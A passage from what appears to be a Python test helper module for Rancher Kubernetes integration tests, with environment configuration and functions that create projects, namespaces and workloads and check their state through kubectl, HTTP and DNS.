"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
# -----------------------------------------------------------------------------
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
workload_list = deployment_list + daemonset_list + cronjob_list
wls = project_client.list_workload(namespaceId=ns.id).data
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
p = wait_for_pod_to_running(p_client, pod)
assert p["status"]["phase"] == "Running"
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
while p.state != "running":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code{0}'.format(expected_code))
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id], "targetPort": "80"}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
cmd = 'ping -c 1 -W 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
assert ping_validation_pass is True
assert " 0% packet loss" in str(ping_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
